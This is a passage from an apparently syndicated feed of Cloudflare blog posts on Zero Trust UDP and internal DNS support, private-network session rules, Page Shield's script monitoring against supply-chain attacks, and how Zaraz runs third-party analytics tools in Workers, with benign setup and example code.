Finally, just because a remote browser reduces the impact of a compromise, doesn’t mean it should have unmanaged access to the Internet. All traffic from the remote browser to the target website is secured, inspected and logged by Cloudflare’s SWG solution (Gateway) ensuring that known threats are filtered through HTTP policies and anti-virus scanning.

Join the clientless web isolation beta

Clientless web isolation will be available as a capability to Cloudflare for Teams subscribers who have added Browser Isolation to their plan. We’ll be opening Cloudflare’s clientless web isolation for beta access soon. If you’re interested in participating, sign up here to be the first to hear from us.

We’re excited about the secure browsing and application access use cases for our clientless web isolation model. Now, teams of any size, can deliver seamless Zero Trust connectivity to unmanaged devices anywhere in the world.

Extending Cloudflare’s Zero Trust platform to support UDP and Internal DNS

Post Syndicated from Abe Carryl original https://blog.cloudflare.com/extending-cloudflares-zero-trust-platform-to-support-udp-and-internal-dns/

Extending Cloudflare’s Zero Trust platform to support UDP and Internal DNS

Extending Cloudflare’s Zero Trust platform to support UDP and Internal DNS

At the end of 2020, Cloudflare empowered organizations to start building a private network on top of our network. Using Cloudflare Tunnel on the server side, and Cloudflare WARP on the client side, the need for a legacy VPN was eliminated. Fast-forward to today, and thousands of organizations have gone on this journey with us — unplugging their legacy VPN concentrators, internal firewalls, and load balancers. They’ve eliminated the need to maintain all this legacy hardware; they’ve dramatically improved speeds for end users; and they’re able to maintain Zero Trust rules organization-wide.

We started with TCP, which is powerful because it enables an important range of use cases. However, to truly replace a VPN, you need to be able to cover UDP, too. Starting today, we’re excited to provide early access to UDP on Cloudflare’s Zero Trust platform. And even better: as a result of supporting UDP, we can offer Internal DNS — so there’s no need to migrate thousands of private hostnames by hand to override DNS rules. You can get started with Cloudflare for Teams for free today by signing up here; and if you’d like to join the waitlist to gain early access to UDP and Internal DNS, please visit here.

The topology of a private network on Cloudflare

Building out a private network has two primary components: the infrastructure side, and the client side.

The infrastructure side of the equation is powered by Cloudflare Tunnel, which simply connects your infrastructure (whether that be a singular application, many applications, or an entire network segment) to Cloudflare. This is made possible by running a simple command-line daemon in your environment to establish multiple secure, outbound-only, load-balanced links to Cloudflare. Simply put, Tunnel is what connects your network to Cloudflare.

On the other side of this equation, we need your end users to be able to easily connect to Cloudflare and, more importantly, your network. This connection is handled by our robust device client, Cloudflare WARP. This client can be rolled out to your entire organization in just a few minutes using your in-house MDM tooling, and it establishes a secure, WireGuard-based connection from your users’ devices to the Cloudflare network.

Extending Cloudflare’s Zero Trust platform to support UDP and Internal DNS

Now that we have your infrastructure and your users connected to Cloudflare, it becomes easy to tag your applications and layer on Zero Trust security controls to verify both identity and device-centric rules for each and every request on your network.

Up until now though, only TCP was supported.

Extending Cloudflare Zero Trust to support UDP

Over the past year, with more and more users adopting Cloudflare’s Zero Trust platform, we have gathered data surrounding all the use cases that are keeping VPNs plugged in. Of those, the most common need has been blanket support for UDP-based traffic. Modern protocols like QUIC take advantage of UDP’s lightweight architecture — and at Cloudflare, we believe it is part of our mission to advance these new standards to help build a better Internet.

Today, we’re excited to open an official waitlist for those who would like early access to Cloudflare for Teams with UDP support.

What is UDP and why does it matter?

UDP is a vital component of the Internet. Without it, many applications would be rendered woefully inadequate for modern use. Applications which depend on near real time communication such as video streaming or VoIP services are prime examples of why we need UDP and the role it fills for the Internet. At their core, however, TCP and UDP achieve the same results — just through vastly different means. Each has their own unique benefits and drawbacks, which are always felt downstream by the applications that utilize them.

Here’s a quick example of how they both work, if you were to ask a question to somebody as a metaphor. TCP should look pretty familiar: you would typically say hi, wait for them to say hi back, ask how they are, wait for their response, and then ask them what you want.

UDP, on the other hand, is the equivalent of just walking up to someone and asking what you want without checking to make sure that they’re listening. With this approach, some of your question may be missed, but that’s fine as long as you get an answer.

Like the conversation above, with UDP many applications actually don’t care if some data gets lost; video streaming or game servers are good examples here. If you were to lose a packet in transit while streaming, you wouldn’t want the entire stream to be interrupted until this packet is received — you’d rather just drop the packet and move on. Another reason application developers may utilize UDP is because they’d prefer to develop their own controls around connection, transmission, and quality control rather than use TCP’s standardized ones.

For Cloudflare, end-to-end support for UDP-based traffic will unlock a number of new use cases. Here are a few we think you’ll agree are pretty exciting.

Internal DNS Resolvers

Most corporate networks require an internal DNS resolver to disseminate access to resources made available over their Intranet. Your Intranet needs an internal DNS resolver for many of the same reasons the Internet needs public DNS resolvers. In short, humans are good at many things, but remembering long strings of numbers (in this case IP addresses) is not one of them. Both public and internal DNS resolvers were designed to solve this problem (and much more) for us.

In the corporate world, it would be needlessly painful to ask internal users to navigate to, say, 192.168.0.1 to simply reach Sharepoint or OneDrive. Instead, it’s much easier to create DNS entries for each resource and let your internal resolver handle all the mapping for your users as this is something humans are actually quite good at.

Under the hood, DNS queries generally consist of a single UDP request from the client. The server can then return a single reply to the client. Since DNS requests are not very large, they can often be sent and received in a single packet. This makes support for UDP across our Zero Trust platform a key enabler to pulling the plug on your VPN.

Thick Client Applications

Another common use case for UDP is thick client applications. One benefit of UDP we have discussed so far is that it is a lean protocol. It’s lean because the three-way handshake of TCP and other measures for reliability have been stripped out by design. In many cases, application developers still want these reliability controls, but are intimately familiar with their applications and know these controls could be better handled by tailoring them to their application. These thick client applications often perform critical business functions and must be supported end-to-end to migrate. As an example, legacy versions of Outlook may be implemented through thick clients where most of the operations are performed by the local machine, and only the sync interactions with Exchange servers occur over UDP.

Again, UDP support on our Zero Trust platform now means these types of applications are no reason to remain on your legacy VPN.

And more…

A huge portion of the world’s Internet traffic is transported over UDP. Often, people equate time-sensitive applications with UDP, where occasionally dropping packets would be better than waiting — but there are a number of other use cases, and we’re excited to be able to provide sweeping support.

How can I get started today?

You can already get started building your private network on Cloudflare with our tutorials and guides in our developer documentation. Below is the critical path. And if you’re already a customer, and you’re interested in joining the waitlist for UDP and Internal DNS access, please skip ahead to the end of this post!

Connecting your network to Cloudflare

First, you need to install cloudflared on your network and authenticate it with the command below:

cloudflared tunnel login

Next, you’ll create a tunnel with a user-friendly name to identify your network or environment.

cloudflared tunnel create acme-network

Finally, you’ll want to configure your tunnel with the IP/CIDR range of your private network. By doing this, you’re making the Cloudflare WARP agent aware that any requests to this IP range need to be routed to our new tunnel.

cloudflared tunnel route ip add 192.168.0.1/32

Then, all you need to do is run your tunnel!

Connecting your users to your network

To connect your first user, start by downloading the Cloudflare WARP agent on the device they’ll be connecting from, then follow the steps in our installer.

Next, you’ll visit the Teams Dashboard and define who is allowed to access our network by creating an enrollment policy. This policy can be created under Settings > Devices > Device Enrollment. In the example below, you can see that we’re requiring users to be located in Canada and have an email address ending @cloudflare.com.

Once you’ve created this policy, you can enroll your first device by clicking the WARP desktop icon on your machine and navigating to preferences > Account > Login with Teams.

Last, we’ll remove the IP range we added to our Tunnel from the Exclude list in Settings > Network > Split Tunnels. This will ensure this traffic is, in fact, routed to Cloudflare and then sent to our private network Tunnel as intended.

In addition to the tutorial above, we also have in-product guides in the Teams Dashboard which go into more detail about each step and provide validation along the way.

To create your first Tunnel, navigate to the Access > Tunnels.

To enroll your first device into WARP, navigate to My Team > Devices.

What’s Next

We’re incredibly excited to release our waitlist today and even more excited to launch this feature in the coming weeks. We’re just getting started with private network Tunnels and plan to continue adding more support for Zero Trust access rules for each request to each internal DNS hostname after launch. We’re also working on a number of efforts to measure performance and to ensure we remain the fastest Zero Trust platform — making using us a delight for your users, compared to the pain of using a legacy VPN.

Zero Trust Private Networking Rules

Post Syndicated from Kenny Johnson original https://blog.cloudflare.com/zero-trust-private-networking-rules/

Zero Trust Private Networking Rules

Zero Trust Private Networking Rules

Earlier this year, we announced the ability to build a private network on Cloudflare’s network with identity-driven access controls. We’re excited to share that you will soon be able to extend that control to sessions and login intervals as well.

Private networks failed to adapt

Private networks were the backbone for corporate applications for years. Security teams used them to build a strict security perimeter around applications. In order to access sensitive data, a user had to physically be on the network. This meant they had to be in an office, connecting from a corporately managed device. This was not perfect — network access could be breached over physical connection or Wi-Fi, but tools like certificates and physical firewalls existed to prevent these threats.

These boundaries were challenged as work became increasingly more remote. Branch offices, data centers and remote employees all required access to applications, so organizations started relying on Virtual Private Networks (VPNs) to put remote users onto the same network as their applications.

In parallel to the problem of connecting users from everywhere, the security model of a private network became an even more dangerous problem. Once inside a private network, users could access any resource on the network by default unless explicitly prohibited. Identity-based controls and logs were difficult to impossible to implement.

Additionally, private networks come with operational overhead. Private networks are routed following RFC 1918 reserved IP space, which is limited and can lead to overlapping IP addresses and collisions. Administrators also need to consider the total load their private network can withstand, a load that can be further exacerbated by employees on the VPN doing video calls or even watching videos on their off time.

Modern alternatives did not solve all use cases

SaaS applications and Zero Trust Networking solutions like Cloudflare Access have made it easier to provide a secure experience without a VPN. Administrators are able to configure controls like multi-factor authentication and logging alerts for anomalous logins for each application. Security controls for public-facing applications have far outpaced applications on private networks.

However, some applications still require a more traditional private network. Use cases that involve thick clients outside the browser or arbitrary TCP or UDP protocols are still better suited to a connectivity model that lives outside the browser.

We heard from customers who were excited to adopt a Zero Trust model, but still needed to support more classic private network use cases. To solve that, we announced the ability to build a private network on our global network. Administrators could build Zero Trust rules around who could reach certain IPs and destinations. End users connected from the same Cloudflare agent that powered their on-ramp to the rest of the Internet. However, one rule was missing.

Bringing session control to Cloudflare’s private network

Cloudflare’s global network makes this possible and lighting fast. The first step is securely connecting any private networks to Cloudflare. This can be done by establishing secure outbound-only tunnels using Cloudflare Tunnel, or by adopting a more traditional connection approach like a GRE or IPSec tunnels.

Once the tunnel connection is established, specific private IP ranges can be advertised on an instance of Cloudflare. This is done with a set of commands to map a tunnel to a CIDR block of IP addresses. In the screenshot below, CIDR ranges are mapped to unique Cloudflare Tunnels — each with their own unique identifier and assigned name.

Zero Trust Private Networking Rules

Once the applications are addressable over Cloudflare’s network, users need a way to access these private IP ranges. This is where a VPN would traditionally be used to place a user onto the same network as the application. Instead, Cloudflare’s WARP client is used to connect a user’s Internet traffic to Cloudflare’s network.

Administrators then have control over the traffic from a user’s device client. They can create granular, identity based policies to control which users can access specific applications on certain IP private addresses or, soon, hostnames.

Zero Trust Private Networking Rules

This was a huge step forward for IT and Security teams, as it eliminates painful latency, management and backhauling issues caused by a VPN. However, when a user authenticated once, they could keep connecting indefinitely unless fully revoked. We know some customers need to force a login every 24 hours, for example, or to set a timeout after one week. We’re excited to give customers the ability to do that.

Launching into beta, administrators can add session rules to the resources made available in this private network model. Administrators will be able to configure specific session durations for their policies and require a user re-authenticates with multi-factor authentication.

What’s next?

This announcement is just one component of making Cloudflare’s Zero Trust private network more powerful for your organization. Also being announced this week is UDP support in this model. Teams will be able to use their existing private DNS nameservers to map their application hostnames on local domains. This prevents issues with clashing or ephemeral private IP addresses for applications.

We’re excited to offer a beta for both of these features. If you would like to try these out before the new year, please use this sign-up link to be alerted when the beta is available.

If you would like to get started with Zero Trust controls for your private network, Cloudflare’s solution is free for the first 50 users. Navigate to dash.teams.cloudflare.com to get started!

Page Shield is generally available

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/page-shield-generally-available/

Page Shield is generally available

Page Shield is generally available

Supply chain attacks are a growing concern for CIOs and security professionals.

During a supply chain attack, an attacker compromises a third party tool or library that is being used by the target application. This normally results in the attacker gaining privileged access to the application’s environment allowing them to steal private data or perform subsequent attacks. For example, Magecart, is a very common type of supply chain attack, whereby the attacker skimms credit card data from e-commerce site checkout forms by compromising third party libraries used by the site.

To help identify and mitigate supply chain attacks in the context of web applications, today we are launching Page Shield in General Availability (GA).

With Page Shield you gain visibility on what scripts are running on your application and can be notified when they have been compromised or are showing malicious behaviour such as attempting to exfiltrate user data.

We’ve worked hard to make Page Shield easy to use: you can find it under the Firewall tab and turn it on with one simple click. No additional configuration required. Alerts can be set up separately on an array of different events.

Page Shield is generally available

What is Page Shield?

Back in March of this year, we announced early access to Page Shield, our solution to protect end user data from exploits targeting the browser.

Earlier today, we announced our acquisition of Zaraz, a tool built on Workers that allows customers to easily load third-party tools on the cloud, instead of loading their JavaScript code in the browser, directly from the Cloudflare UI with immediate performance and security benefits. But not all applications use, or wish to use, a third-party manager. Nonetheless, we have got you covered.

Page Shield leverages our position in the network as a reverse proxy to receive information directly from the browser about what JavaScript files and modules are being loaded. We then provide visibility, analyse, and warn you whenever a JavaScript file is showing malicious behaviour.

Examples of compromised JavaScript files include Magecart attacks, cryptomining, and adware. With the ever-growing popularity of SaaS-based applications and services, it is very rare to find an application that does not leverage or load JavaScript code directly from third parties out of the application owner’s control, making detecting and mitigating compromised files even harder.

How hard is client-side security?

Early indications from Page Shield indicate that, on average, any given application is loading scripts from eight third-party hosts. These hosts could be owned by large enterprises such as Google, to smaller companies that provide “plug and play” modules that quickly enhance web application functionality (think chat systems, date pickers, checkout platforms etc.). Each one of these third parties can be a target for a potential supply chain attack, making the attack surface very large and difficult to monitor.

To make matters worse, things change fast. On average about 50% of applications are loading scripts from new third party hosts every month. This indicates that the attack surface is not only large, but also changing rapidly.

How does Page Shield work?

As with any security product, we can think of Page Shield as providing visibility, detection, mitigation, and prevention. The first step is visibility.

Visibility

When turned on, the current iteration of Page Shield uses a content security policy (CSP) deployed with a report-only directive to collect information from the browser. This allows us to provide you with a list of all scripts running on your application.

In HTTP terms, this is an HTTP response header added to a sample of page responses from the origin server back to the browser. The CSP header looks like this:

content-security-policy-report-only: script-src 'none'; report-uri /cdn-cgi/script_monitor/report

The above header instructs the browser that no scripts should be loaded  (script-src 'none') and to report any violation to the endpoint provided (report-uri /cdn-cgi/script_monitor/report). Also note that the violation report endpoint resolves to the Cloudflare network where it is processed, so no additional traffic reaches the origin server.

Each violation report sent by the browser, implemented as an HTTP POST request, provides us with information on the script. Here is an example:

{
   "csp-report":{
      "document-uri":"https://www.example.com/",
      "referrer":"",
      "violated-directive":"script-src-elem",
      "effective-directive":"script-src-elem",
      "original-policy":"script-src 'none'; report-uri /cdn-cgi/script_monitor/report",
      "Disposition":"report",
      "blocked-uri":"https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js",
      "status-code":200,
      "script-sample":""
   }
}

This report tells us:

  • The page the script was loaded from (document-uri)
  • The referrer, if applicable
  • Which CSP directive was violated
  • The full CSP that contains the directive
  • The full link to the JavaScript file
  • The response code the browser received when loading the file. In the example above, the response code is 200, which indicates that the file was loaded successfully.

By collating all the information provided in the reports and enhancing it with additional data, we are able to provide detailed information on every script being loaded by your application, both via the Cloudflare UI and API.

All Cloudflare Pro zones have access to our Page Shield script reports. Additionally, Business and Enterprise zones have access to page attribution information, allowing you to quickly identify where a script is being loaded from within your application. Business and Enterprise zones can also set up alerts on a number of script change events.

Detection

Application owners might be leveraging content security policies already to ensure only specific scripts are loaded. However, CSPs often tend to be too liberal, and browsers provide no native mechanisms to detect when JavaScript files show malicious behaviour. This includes JavaScript code that is allowed to be loaded according to a content security policy, highly reducing their effectiveness.

With Page Shield we believe to have a real opportunity to help our customers with malicious behaviour detection.

For any JavaScript file found in your zone by the system, we will perform a number of actions aimed at detecting malicious behaviour:

  1. Any JavaScript file loaded from a hostname categorised as malicious in our threat feeds will be flagged appropriately. This includes parent domains.
  2. Similarly, if specific URLs are categorised as malicious in our feeds, these will also be flagged. In this latter case, given the exact file has been categorized as malicious, an attack is likely ongoing.
  3. Finally, we will download the file and run it through our classifier. The classifier performs deobfuscation, normalisation and decoding steps before looking for correlations between form field fetches and data exfiltration calls. The stronger the correlation the more likely the script is performing a Magecart type attack. We will post additional technical details about our technology in follow-up posts — stay tuned!

Our Enterprise customers can purchase the full set of Page Shield capabilities, including the detection capabilities. Please contact your account manager.

As we build the product further through next year, we plan to add additional detection signals as well as improve upon our classifier and detect additional attack types, including adware, ransomware and crypto mining.

Once a malicious signal triggers on a JavaScript file, Cloudflare is able to notify you via an alert that can be set up via email, webhook, PagerDuty, and other formats.

Prevention and mitigation

Many of our larger customers have content security policies already, and although it is easy to add an HTTP response header that implements a CSP via Cloudflare, we can do better.

Although not included in this immediate release, we are already hard at work to bring both prevention and mitigation options to Page Shield:

  • Prevention by allowing easy CSP generation based on observed active scripts, allowing for editing and redeploying of policies as required either via the dashboard or directly via API as part of a deployment pipeline.
  • Blocking by leveraging our proxy to allow for malicious scripts to be removed inline from HTTP response bodies.

Get started

If you already have a website on Cloudflare, upgrade to any of our paid plans to start leveraging Page Shield features today without any additional configuration required. You can also use our API to leverage Page Shield features.

If you do not have a website on Cloudflare, signing up only takes 5 minutes!

Zaraz use Workers to make third-party tools secure and fast

Post Syndicated from Yo'av Moshe original https://blog.cloudflare.com/zaraz-use-workers-to-make-third-party-tools-secure-and-fast/

Zaraz use Workers to make third-party tools secure and fast

Zaraz use Workers to make third-party tools secure and fast

We decided to create Zaraz around the end of March 2020. We were working on another product when we noticed everyone was asking us about the performance impact of having many third-parties on their website. Third-party content is an important part of the majority of websites today, powering analytics, chatbots, conversion pixels, widgets — you name it. The definition of third-party is an asset, often JavaScript, hosted outside the primary site-user relationship, that is not under the direct control of the site owner but is present with ‘approval’. Yair wrote in detail about the process of measuring the impact of these third-party tools, and how we pivoted our startup, but I wanted to write about how we built Zaraz and what it actually does behind the scenes.

Third parties are great in that they let you integrate already-made solutions with your website, and you barely need to do any coding. Analytics? Just drop this code snippet. Chat widget? Just add this one. Third-party vendors will usually instruct you on how to add their tool, and from that point on things should just be working. Right? But when you add third-party code, it usually fetches even more code from remote sources, meaning you have less and less control over whatever is happening in your visitors’ browsers. How can you guarantee that none of the multitude of third parties you have on your website wasn’t hacked, and started stealing information, mining cryptocurrencies or logging key presses on your visitors’ computers?

It doesn’t even have to be a deliberate hack. As we investigated more and more third-party tools, we noticed a pattern — sometimes it’s easier for a third-party vendor to collect everything, rather than being selective or careful about it. More often than not, user emails would find their way into a third-party tool, which could very easily put the website owner in trouble due to GDPR, CCPA, or similar.

How third-party tools work today

Usually, when you add a third party to your page, you’re asked to add a piece of JavaScript code to the <head> of your HTML. Google Analytics is by far the most popular third-party, so let’s see how it’s done there:

<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->

In this case, and in most other cases, the snippet that you’re pasting actually calls more JavaScript code to be executed. The snippet above creates a new <script> element, gives it the https://www.google-analytics.com/analytics.js src attribute, and appends it to the DOM. The browser then loads the analytics.js script, which includes more JavaScript code than the snippet itself, and sometimes asks the browser to download even more scripts, some of them bigger than analytics.js itself. So far, however, no analytics data has been captured at all, although this is why you’ve added Google Analytics in the first place.

The last line in the snippet, ga('send', 'pageview');, uses a function defined in the analytics.js file to finally send the pageview. The function is needed because it is what is capturing the analytics data — it fetches the kind of browser, the screen resolution, the language, etc…  Then, it constructs a URL that includes all the data, and  sends a request to this URL. It’s only after this step that the analytics information gets captured. Every user behavior event you record using Google Analytics will result in another request.

The reality is that the vast majority of tools consist of more than one resource file, and that it’s practically impossible to know in advance what a tool is going to load without testing it on your website. You can use Request Map Generator to get a visual representation of all the resources loaded on your website, including how they call each other. Below is a Request Map of a demo e-commerce website we created:

Zaraz use Workers to make third-party tools secure and fast

That big blue circle is our website’s resources, and all other circles are third-party tools. You can see how the big green circle is actually a sub-request of the main Facebook pixel (fbevents.js), and how many tools, like LinkedIn on top right, are creating a redirect chain in order to sync some data, on the expense of forcing the browser to make more and more network requests.

A new place to run a tag manager — the edge

Since we want to make third-parties faster, more secure, and private, we had to develop a fundamental new way of thinking about them and a new system for how they run. We came up with a plan: build a platform where third-parties can run code outside the browser, while still getting access to the information they need and being able to talk with the DOM when necessary. We don’t believe third parties are evil: they never intended to slow down the Internet for everyone, they just didn’t have another option. Being able to run code on the edge and run it fast opened up new possibilities and changed all that, but the transition is hard.

By moving third-party code to run outside the browser, we get multiple wins.

  • The website will load faster and be more interactive. The browser rendering your website can now focus on the most important thing — your website. The downloading, parsing and execution of all the third-party scripts will no longer compete or even block the rendering and interactivity of your website.
  • Control over the data sent to third-parties. Third-party tools often automatically collect information from the page and from the browser to, for example, measure site behaviour/usage. In many cases, this information should stay private. For example, most tools collect the document.location, but we often see a “reset password” page including the user email in the URL, meaning emails are unknowingly being sent and saved by third-party providers, usually without consent. Moving the execution of the third parties to the edge means we have full visibility into what is being sent. This means we can provide alerts and filters in case tools are trying to collect Personally Identifiable Information or mask the private parts of the data before they reach third-party servers. This feature is currently not available on the public beta, but contact us if you want to start using it today.
  • By reducing the amount of code being executed in the browser and by scanning all code that is executed in it, we can continuously verify that the code hasn’t been tampered with and that it only does what it is intended to do. We are working to connect Zaraz with Cloudflare Page Shield to do this automatically.

When you configure a third-party tool through a normal tag manager, a lot happens in the browsers of your visitors which is out of your control. The tag manager will load and then evaluate all trigger rules to decide which tools to load. It would then usually append the script tags of those tools to the DOM of the page, making the browser fetch the scripts and execute them. These scripts come from untrusted or unknown origins, increasing the risk of malicious code execution in the browser. They can also block the browser from becoming interactive until they are completely executed. They are generally free to do whatever they want in the browser, but most commonly they would then collect some information and send it to some endpoint on the third-party server. With Zaraz, the browser essentially does none of that.

Zaraz use Workers to make third-party tools secure and fast

Choosing Cloudflare Workers

When we set about coding Zaraz, we quickly understood that our infrastructure decisions would have a massive impact on our service. In fact, choosing the wrong one could mean we have no service at all. The most common alternative to Zaraz is traditional Tag Management software. They generally have no server-side component: whenever a user “publishes” a configuration, a JavaScript file is rendered and hosted as a static asset on a CDN. With Zaraz the idea is to move most of the evaluation of code out of the browser, and respond with a dynamically generated JavaScript code each time. We needed to find a solution that would allow us to have a server-side component, but would be as fast as a CDN. Otherwise, there was a risk we might end up slowing down websites instead of making them faster.

We needed Zaraz to be served from a place close to the visiting user. Since setting up servers all around the world seemed like too big of a task for a very young startup, we looked at a few distributed serverless platforms. We approached this search with a small list of requirements:

  • Run JavaScript: Third-party tools all use JavaScript. If we were to port them to run in a cloud environment, the easiest way to do so would be to be able to use JavaScript as well.
  • Secure: We are processing sensitive data. We can’t afford the risk of someone hacking into our EC2 instance. We wanted to make sure that data doesn’t stay on some server after we sent our HTTP response.
  • Fully programmable: Some CDNs allow setting complicated rules for handling a request, but altering HTTP headers, setting redirects or HTTP response codes isn’t enough. We need to generate JavaScript code on the fly, meaning we need full control over the responses. We also need to use some external JavaScript libraries.
  • Extremely fast and globally distributed: In the very early stages of the company, we already had customers in the USA, Europe, India, and Israel. As we were preparing to show them a Proof of Concept, we needed to be sure it would be fast wherever they are. We were competing with tag managers and Customer Data Platforms that have a pretty fast response time, so we need to be able to respond as fast as if our content was statically hosted on a CDN, or faster.

Initially we thought we would need to create Docker containers that would run around the globe and would use their own HTTP server, but then a friend from our Y Combinator batch said we should check out Cloudflare Workers.

At first, we thought it wouldn’t work — Workers doesn’t work like a Node.js application, and we felt that limitation would prevent us from building what we wanted. We planned to let Workers handle the requests coming from users’ browsers, and then use an AWS Lambda for the heavy lifting of actually processing data and sending it to third-party vendors.

Our first attempt with Workers was very simple: just confirming we could use it to actually return dynamic browser-side JavaScript that is generated on-the-fly:

addEventListener('fetch', (event) => {
 event.respondWith(handleRequest(event.request))
})
 
async function handleRequest(request) {
   let code = '(function() {'
  
   if (request.headers.get('user-agent').includes('Firefox')) {
     code += `console.log('Hello Firefox!');`
   } else {
     code += `console.log('Hey other browsers...');`
   }
  
   code += '})();'
  
   return new Response(code, {
     headers: { 'content-type': 'text/javascript' }
   });
}

It was a tiny example, but I remember calling Yair afterwards and saying “this could actually work!”. It proved the flexibility of Workers. We just created an endpoint that served a JavaScript file, this JavaScript file was dynamically generated, and the response time was less than 10ms. We could now put <script src="path/to/worker.js"> in our HTML and treat this Worker like a normal JavaScript file.

As we took a deeper look, we found Workers answering demand after demand from our list, and learned we could even do the most complicated things inside Workers. The Lambda function started doing less and less, and was eventually removed. Our little Node.js proof-of-concept was easily converted to Workers.

Using the Cloudflare Workers platform: “standing on the shoulders of giants”

When we raised our seed round we heard many questions like “if this can work, how come it wasn’t built before?” We often said that while the problem has been a long standing one, accessible edge computing is a new possibility. Later, on our first investors update after creating the prototype, we told them about the unbelievably fast response time we managed to achieve and got much praise for it — talk about “standing on the shoulders of giants”. Workers simply checked all our boxes. Running JavaScript and using the same V8 engine as the browser meant that we could keep the same environment when porting tools to run on the cloud (it also helped with hiring). It also opened the possibility of later on using WebAssembly for certain tasks. The fact that Workers are serverless and stateless by default was a selling point for our own trustworthiness: we told customers we couldn’t save their personal data even by mistake, which was true. The integration between webpack and Wrangler meant that we could write a full-blown application — with modules and external dependencies — to shift 100% of our logic into our Worker. And the performance helped us ace all our demos.

As we were building Zaraz, the Workers platform got more advanced. We ended up using Workers KV for storing user configuration, and Durable Objects for communicating between Workers. Our main Worker holds server-side implementations of more than 50 popular third-party tools, replacing hundreds of thousands of JavaScript lines of code that traditionally run inside browsers. It’s an ever growing list, and we recently also published an SDK that allows third-party vendors to build support for their tools by themselves. For the first time, they can do it in a secure, private, and fast environment.

A new way to build third-parties

Most third-party tools do two fundamental things: First, they collect some information from the browser such as screen resolution, current URL, page title or cookie content. Second, they send it to their server. It is often simple, but when a website has tens of these tools, and each of them query for the information it needs and then sends its requests, it can cause a real slowdown. On Zaraz, this looks very different: Every tool provides a run function, and when Zaraz evaluates the user request and decides to load a tool, it executes this run function. This is how we built integrations for over 50 different tools, all from different categories, and this is how we’re inviting third-party vendors to write their own integrations into Zaraz.

run({system, utils}) { 
  // The `system` object includes information about the current page, browser, and more 
  const { device, page, cookies } = system
  // The `utils` are a set of functions we found useful across multiple tools
  const { getCookieString, waitUntil } = utils

  // Get the existing cookie content, or create a new UUID instead
  const cookieName = 'visitor-identifier'
  const sessionCookie = cookies[cookieName] || crypto.randomUUID()

  // Build the payload
  const payload = {
    session: sessionCookie,
    ip: device.ip,
    resolution: device.resolution,
    ua: device.userAgent,
    url: page.url.href,
    title: page.title,
  }

  // Construct the URL
  const baseURL = 'https://example.com/collect?'
  const params = new URLSearchParams(payload)
  const finalURL = baseURL + params

  // Send a request to the third-party server from the edge
  waitUntil(fetch(finalURL))
  
  // Save or update the cookie in the browser
  return getCookieString(cookieName, sessionCookie)
}

The above code runs in our Cloudflare Worker, instead of the browser. Previously, having 10x more tools meant 10x more requests browsers rendering your website needed to make, and 10x more JavaScript code they needed to evaluate. This code would often be repetitive, for example, almost every tool implements their own “get cookie” function. It’s also 10x more origins you have to trust no one is tampering with. When running tools on the edge, this doesn’t affect the browser at all: you can add as many tools as you want, but they wouldn’t be loading in the browser, so they will have no effect.

In this example, we first check for the existence of a cookie that identifies the session, called “visitor-identifier”. If it exists, we read its value; if not, we generate a new UUID for it. Note that the power of Workers is all accessible here: we use crypto.randomUUID() just like we can use any other Workers functionality. We then collect all the information our example tool needs — user agent, current URL, page title, screen resolution, client IP address — and the content of the “visitor-identifier” cookie. We construct the final URL that the Worker needs to send a request to, and we then use waitUntil to make sure the request gets there. Zaraz’s version of fetch gives our tools automatic logging, data loss prevention and retries capabilities.

Lastly, we return the value of the getCookieString function. Whatever string is returned by the run function is passed to the visitor as browser-side JavaScript. In this case, getCookieString returns something like document.cookie = 'visitor-identifier=5006e6fa-7ce6-45ef-8724-c846f1953369; Path=/; Max-age=31536000';, causing the browser to create a first-party cookie. The next time a user loads a page, the visitor-identifier cookie should exist, causing Zaraz to reuse the UUID instead of creating a new one.

This system of run functions allows us to separate and isolate each tool to run independently of the rest of the system, while still providing it with all the required context and data coming from the browser, and the capabilities of Workers. We are inviting third-party vendors to work with us to build the future of secure, private and fast third-party tools.

A new events system

Many third-party tools need to collect behavioral information during a user visit. For example, you might want to place a conversation pixel right after a user clicked “submit” on the credit card form. Since we moved tools to the cloud, you can’t access their libraries from the browser context anymore. For that we created zaraz.track() — a method that allows you to call tools programmatically, and optionally provide them with more information:

document.getElementById("credit-card-form").addEventListener("submit", () => {
  zaraz.track("card-submission", {
    value: document.getElementById("total").innerHTML,
    transaction: "X-98765",
  });
});

In this example, we’re letting Zaraz know about a trigger called “card-submission”, and we associate some data with it — the value of the transaction that we’re taking from an element with the ID total, and a transaction code that is hardcoded and gets printed directly from our backend.

In the Zaraz interface, configured tools can be subscribed to different and multiple triggers. When the code above gets triggered, Zaraz checks, on the edge, what tools are subscribed to the card-submission trigger, and it then calls them with the right additional data supplied, populating their requests with the transaction code and its value.

This is different from how traditional tag managers work: GTM’s dataLayer.push serves a similar purpose, but is evaluated client-side. The result is that GTM itself, when used intensively, will grow its script so much that it can become the heaviest tool a website loads. Each event sent using dataLayer.push will cause repeated evaluation of code in the browser, and each tool that will match the evaluation will execute code in the browser, and might call more external assets again. As these events are usually coupled with user interactions, this often makes interacting with a website feel slow, because running the tools is occupying the main thread. With Zaraz, these tools exist and are evaluated only at the edge, improving the website’s speed and security.

Zaraz use Workers to make third-party tools secure and fast

You don’t have to be coder to use triggers. The Zaraz dashboard allows you to choose from a predefined set of templates like click listeners, scroll events and more, that you can attach to any element on your website without touching your code. When you combine zaraz.track() with the ability to program your own tools, what you get is essentially a one-liner integration of Workers into your website. You can write any backend code you want and Zaraz will take care of calling it exactly at the right time with the right parameters.

Joining Cloudflare

When new customers started using Zaraz, we noticed a pattern: the best teams we worked with chose Cloudflare, and some were also moving parts of their backend infrastructure to Workers. We figured we could further improve performance and integration for companies using Cloudflare as well. We could inline parts of the code inside the page and then further reduce the amount of network requests. Integration also allowed us to remove the time it takes to DNS resolve our script, because we could use Workers to proxy Zaraz into our customers’ domains. Integrating with Cloudflare made our offering even more compelling.

